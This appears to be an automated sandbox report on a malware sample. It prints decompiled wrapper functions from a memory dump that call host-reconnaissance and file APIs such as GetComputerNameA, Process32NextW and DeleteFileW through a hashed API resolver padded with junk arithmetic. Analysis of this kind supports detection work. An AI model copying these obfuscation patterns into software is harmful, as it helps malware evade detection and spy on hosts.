Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
Instruction ID: 6c9247c1494e0430e7af192e2c9ebdad8a4dc037f7a170ec8d45a2d22dfa5ef9
Opcode Fuzzy Hash: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
Instruction Fuzzy Hash: F1015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 001D602C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001D602C(void* __ecx, CHAR* __edx, DWORD* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t23;
				int _t29;
				CHAR* _t34;

				_push(_a8);
				_t34 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D602B(_t23);
				_v16 = _v16 & 0x00000000;
				_v28 = 0x56a9ae;
				_v24 = 0x46a5f8;
				_v20 = 0x71462f;
				_v8 = 0x2cb4;
				_v8 = _v8 + 0xdc6b;
				_v8 = _v8 * 0x25;
				_v8 = _v8 ^ 0x0026370c;
				_v12 = 0x2021;
				_v12 = _v12 ^ 0x8c534c3d;
				_v12 = _v12 ^ 0x8c530eb3;
				E001E07A9(0xbd983dde, 0x9164b7cc, __ecx, __ecx, 0x16f);
				_t29 = GetComputerNameA(_t34, _a4); // executed
				return _t29;
			}

0x001d6033
0x001d6036
0x001d6038
0x001d603b
0x001d603c
0x001d603d
0x001d6042
0x001d6049
0x001d6055
0x001d605c
0x001d6063
0x001d606a
0x001d6081
0x001d6084
0x001d608b
0x001d6092
0x001d6099
0x001d60a6
0x001d60b2
0x001d60b8

APIs

GetComputerNameA.KERNEL32(?,8C530EB3,?,?,?,?,?,?,0000007A), ref: 001D60B2

Strings

/Fq, xrefs: 001D605C

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ComputerName
String ID: /Fq
API String ID: 3545744682-1299280358
Opcode ID: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
Instruction ID: 8af1e7b233341fe129724563e53a24b1e23552ac58f3bf76379f5cbe0c9fba82
Opcode Fuzzy Hash: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
Instruction Fuzzy Hash: 040116B5C0120CBBDB04EFE4D94A9EEBFB4EF45314F108189E8086B251D3B54BA49B92

Uniqueness

Uniqueness Score: -1.00%

Function 001D595A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E001D595A(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				void* _t22;
				int _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(_a8);
				_t33 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D602B(_t22);
				_v8 = 0xecfb;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x8346;
				_v8 = _v8 + 0xffffe2f9;
				_v8 = _v8 ^ 0x000008ac;
				_v12 = 0x34e0;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x1d0c124c;
				_v12 = _v12 ^ 0x1d0c2b7f;
				E001E07A9(0xe8880df4, 0x9164b7cc, __ecx, __ecx, 0x196);
				_t27 = FindNextFileW(_t33, _a4); // executed
				return _t27;
			}

0x001d595d
0x001d595e
0x001d5960
0x001d5963
0x001d5965
0x001d5968
0x001d5969
0x001d596a
0x001d596f
0x001d5979
0x001d5982
0x001d5989
0x001d5990
0x001d5997
0x001d599e
0x001d59a2
0x001d59a9
0x001d59c2
0x001d59ce
0x001d59d4

APIs

FindNextFileW.KERNEL32(?,1D0C2B7F), ref: 001D59CE

Strings

4, xrefs: 001D5997

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileFindNext
String ID: 4
API String ID: 2029273394-293933855
Opcode ID: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
Instruction ID: 44be447c052eb699c3d4fb0900258f36339fce31cb34499323b5508d0488c076
Opcode Fuzzy Hash: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
Instruction Fuzzy Hash: 6A014676D01208BFEB15DFA4C84A8DEBE78EF54354F108188F80867250E7B25F649BA2

Uniqueness

Uniqueness Score: -1.00%

Function 001E4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E001E4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001E07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x001e4f80
0x001e4f81
0x001e4f82
0x001e4f86
0x001e4f87
0x001e4f8c
0x001e4fa5
0x001e4fa8
0x001e4faf
0x001e4fb6
0x001e4fc7
0x001e4fca
0x001e4fd7
0x001e4fe2
0x001e4fe7

APIs

CloseHandle.KERNEL32(003E66D8), ref: 001E4FE2

Strings

{#lm, xrefs: 001E4FC2

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
Instruction ID: 6704b2815e5b6340f86946b0b895de4bfb083cb0925a4a1645cfd3f49927c494
Opcode Fuzzy Hash: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
Instruction Fuzzy Hash: 50F037B0C1120CFFDB04DFA4D98289EBFBAEB44300F208199E804AB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001E375D, Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E001E375D(void* __edx, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, DWORD* _a32, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				int _t42;
				signed int _t43;

				_push(_a52);
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(0);
				E001D602B(_t35);
				_v28 = 0x6b2c80;
				_v24 = 0x4fb02;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0xe6a1;
				_v8 = _v8 ^ 0xa0873718;
				_v8 = _v8 + 0xffffab24;
				_v8 = _v8 ^ 0x2595dee0;
				_v8 = _v8 ^ 0x8512f71c;
				_v12 = 0x8058;
				_t43 = 5;
				_v12 = _v12 / _t43;
				_v12 = _v12 ^ 0x000051c4;
				E001E07A9(0xb356cba0, 0x9164b7cc, _t43, _t43, 0x178);
				_t42 = GetVolumeInformationW(_a12, 0, 0, _a32, 0, 0, 0, 0); // executed
				return _t42;
			}

0x001e3764
0x001e3769
0x001e376a
0x001e376d
0x001e376e
0x001e3771
0x001e3774
0x001e3775
0x001e3778
0x001e377b
0x001e377e
0x001e3781
0x001e3782
0x001e3784
0x001e3785
0x001e378a
0x001e3794
0x001e379d
0x001e37a0
0x001e37a3
0x001e37aa
0x001e37b1
0x001e37b8
0x001e37bf
0x001e37c6
0x001e37d2
0x001e37da
0x001e37e2
0x001e37f6
0x001e380a
0x001e3810

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 001E380A

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
Instruction ID: 21bf993ded197574e70fce274c3138b849d9dd9542b0ef421d12c86d80882553
Opcode Fuzzy Hash: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
Instruction Fuzzy Hash: 5A1117B1802219BBCF55DF95DD098DF7EB9EF49360F104049F90862160C3B14A64DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 001DB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E001DB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001D602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001E07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

APIs

CreateFileW.KERNEL32(A45C8003,?,9C67384B,00000000,0ADDA027,53345D77,00000000), ref: 001DB5FD

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
Instruction ID: 37c1b1c4d25d484248efe105347f02daa2207a1a560edb8fe11a26f7b2631849
Opcode Fuzzy Hash: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
Instruction Fuzzy Hash: 0611C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 001E36D3, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E001E36D3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t23;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				signed int _t34;
				void* _t41;

				_t41 = __edx;
				_t32 = __ecx;
				E001D602B(_t23);
				_v28 = 0x12ca0f;
				asm("stosd");
				asm("stosd");
				_t34 = 0x2d;
				asm("stosd");
				_v8 = 0xdb27;
				_v8 = _v8 >> 9;
				_v8 = _v8 / _t34;
				_v8 = _v8 ^ 0x000020cb;
				_v12 = 0x489;
				_v12 = _v12 | 0x46cddb89;
				_v12 = _v12 ^ 0x46cde771;
				_t30 = E001E07A9(0x9dd48097, 0x9164b7cc, _t34, _t34, 0x113);
				_t31 =  *_t30(_t32, _t41, __ecx, __edx, _a4, _a8); // executed
				return _t31;
			}

0x001e36df
0x001e36e1
0x001e36e8
0x001e36ed
0x001e36fc
0x001e3701
0x001e3702
0x001e3709
0x001e370a
0x001e3711
0x001e371b
0x001e3723
0x001e372f
0x001e3736
0x001e373d
0x001e374a
0x001e3754
0x001e375c

APIs

ProcessIdToSessionId.KERNEL32(00000000,00000000,?,?,?,?,00000000,1B7BC3FB,?), ref: 001E3754

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
Instruction ID: bdd1c8c0c888123594d13b93edf587b7c6dbc403ec846102c63811e06d0b603c
Opcode Fuzzy Hash: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
Instruction Fuzzy Hash: B2019275A01208FBEB04DBA9DC469DFBFB4EF84364F208099EA04A7251D7B15F1487A0

Uniqueness

Uniqueness Score: -1.00%

Function 001D1132, Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E001D1132(void* __ecx, intOrPtr _a8, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, _Unknown_base(*)()* _a32) {
				unsigned int _v8;
				signed int _v12;
				void* _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E001D602B(_t27);
				_v12 = 0xe2c5;
				_v12 = _v12 * 0x1f;
				_v12 = _v12 | 0x070d55ff;
				_v12 = _v12 ^ 0x071f7e34;
				_v8 = 0x91c3;
				_v8 = _v8 + 0xffff5023;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x7e1e17b8;
				E001E07A9(0x4bc4bb1d, 0x9164b7cc, __ecx, __ecx, 0x235);
				_t33 = CreateThread(0, 0, _a32, _a16, 0, 0); // executed
				return _t33;
			}

0x001d1135
0x001d1136
0x001d113a
0x001d113b
0x001d113e
0x001d1141
0x001d1144
0x001d1147
0x001d114a
0x001d114b
0x001d114e
0x001d114f
0x001d1150
0x001d1151
0x001d1156
0x001d116f
0x001d1172
0x001d1179
0x001d1180
0x001d1187
0x001d118e
0x001d1192
0x001d1195
0x001d11a8
0x001d11ba
0x001d11c0

APIs

CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 001D11BA

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
Instruction ID: bc386c9f9f5098cb4e78489c5191d3cf21f2403a04da438f1e2f35de0dfaaf37
Opcode Fuzzy Hash: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
Instruction Fuzzy Hash: 1701F772902219BBCF15DFE5DD49CCFBFB9EF09254F104188F90962250D3729A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E001E981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001E07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00001000,?,?,?,001D87F2,0000CAAE,0000510C,AD82F196), ref: 001E989B

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
Instruction ID: b7709b50ae51164d8aeb1307988349b9148569f66681926d56ec9366ccc2218f
Opcode Fuzzy Hash: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
Instruction Fuzzy Hash: BA019A72801208FBDB04EFD5D846CDFBF79EF85310F108189F908A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E9AC7, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E001E9AC7(void* __ecx, void* __edx, struct tagPROCESSENTRY32W _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				void* _t26;
				int _t33;
				signed int _t35;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001D602B(_t26);
				_v12 = 0x3a37;
				_t35 = 0x5f;
				_v12 = _v12 / _t35;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x0000271a;
				_v8 = 0x41ad;
				_v8 = _v8 ^ 0xae17da57;
				_v8 = _v8 + 0xffff40f3;
				_v8 = _v8 ^ 0xae16a338;
				E001E07A9(0xfb40698d, 0x9164b7cc, _t35, _t35, 0x16d);
				_t33 = Process32NextW(_a12, _a4); // executed
				return _t33;
			}

0x001e9acc
0x001e9acf
0x001e9ad2
0x001e9ad7
0x001e9adf
0x001e9aed
0x001e9af5
0x001e9afd
0x001e9b01
0x001e9b08
0x001e9b0f
0x001e9b16
0x001e9b1d
0x001e9b31
0x001e9b3f
0x001e9b44

APIs

Process32NextW.KERNEL32(DDC40DBA,0000271A), ref: 001E9B3F

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
Instruction ID: f710de3cb7d5cff256afb25426f51f717ef93408b67b2f84f8118466f73dc302
Opcode Fuzzy Hash: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
Instruction Fuzzy Hash: 9E014BB1900208BFEF04DFA4CC468AEBFB5EF44350F108098F509A6291D7B25FA09B50

Uniqueness

Uniqueness Score: -1.00%

Function 001D7663, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001D7663(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				intOrPtr* _t26;
				void* _t27;

				E001D602B(_t22);
				_v12 = 0xe6d;
				_v12 = _v12 | 0x830368b1;
				_v12 = _v12 ^ 0x83037da7;
				_v8 = 0xe4f2;
				_v8 = _v8 << 0xc;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xc9e423b1;
				_t26 = E001E07A9(0xeb8f70d2, 0x9164b7cc, __ecx, __ecx, 0xc5);
				_t27 =  *_t26(_a4, 0, _a8, _a12, __ecx, __edx, _a4, _a8, _a12, 0, _a20, __ecx, __ecx); // executed
				return _t27;
			}

0x001d7678
0x001d767d
0x001d7687
0x001d7693
0x001d769a
0x001d76a1
0x001d76a5
0x001d76a9
0x001d76c2
0x001d76d5
0x001d76da

APIs

QueryFullProcessImageNameW.KERNEL32(83037DA7,00000000,?,?,?,?,?,?,001D620E,00000000,?,?), ref: 001D76D5

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
Instruction ID: 572018427f557a5cc8b2012e89cb39267f64330b3d7a0ba3d0eadc20d7847599
Opcode Fuzzy Hash: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
Instruction Fuzzy Hash: ED01467690020CBFEF059F90CC06AAEBFB5EB48700F108188FA1426260D3B29A609B90

Uniqueness

Uniqueness Score: -1.00%

Function 001EAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001EAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001E07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x001eaa3f
0x001eaa40
0x001eaa41
0x001eaa44
0x001eaa47
0x001eaa4b
0x001eaa4c
0x001eaa51
0x001eaa5b
0x001eaa64
0x001eaa68
0x001eaa6f
0x001eaa76
0x001eaa8d
0x001eaa90
0x001eaa9d
0x001eaaa8
0x001eaaad

APIs

DeleteFileW.KERNEL32(?,?,?,?,A6E18774,?,?), ref: 001EAAA8

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
Instruction ID: 6cc9e9da56f875ccb929634986dd8fabee2daaccf13b632fb616f58897090f90
Opcode Fuzzy Hash: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
Instruction Fuzzy Hash: 20F019B590020CFFDF08DF94DD4A99EBFB5EB45304F108198F915A6250D3B69F549B50

Uniqueness

Uniqueness Score: -1.00%

Function 001E9A56, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001E9A56(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				void* _t29;

				_t29 = __ecx;
				E001D602B(_t18);
				_v12 = 0x9a38;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x00004339;
				_v8 = 0x299d;
				_v8 = _v8 + 0xa1ce;
				_v8 = _v8 | 0xc5f89a67;
				_v8 = _v8 + 0x125d;
				_v8 = _v8 ^ 0xc5f8b599;
				_t22 = E001E07A9(0x9f217491, 0x9164b7cc, __ecx, __ecx, 0x24e);
				_t23 =  *_t22(_t29, __ecx, __edx, _a4, _t28, __ecx, __ecx); // executed
				return _t23;
			}

0x001e9a5f
0x001e9a63
0x001e9a68
0x001e9a72
0x001e9a7b
0x001e9a82
0x001e9a89
0x001e9a90
0x001e9a97
0x001e9a9e
0x001e9ab7
0x001e9ac0
0x001e9ac6

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 001E9AC0

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
Instruction ID: 2b6a968f3007fe3925dc6b15994777dbc1c5f10e398f9f691d832b53d02b8626
Opcode Fuzzy Hash: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
Instruction Fuzzy Hash: BBF037B1901218FFEB08DB94D94A8DEBAB8EF55314F108088F40466240E7B51F548BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001D5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001E07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x001d5fb5
0x001d5fb6
0x001d5fb7
0x001d5fbb
0x001d5fbc
0x001d5fc1
0x001d5fcb
0x001d5fd7
0x001d5fde
0x001d5fe5
0x001d5ffc
0x001d5fff
0x001d6006
0x001d600d
0x001d601a
0x001d6025
0x001d602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 001D6025

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
Instruction ID: 21e3675d678c7d47ccde82411a3224adeb747ad6c423f1aa475c33c6d4e2ced6
Opcode Fuzzy Hash: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
Instruction Fuzzy Hash: 7DF04FB0C11208FFDB08DFA0E94689EBFB8EB54300F208198E409A7260E7B15F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

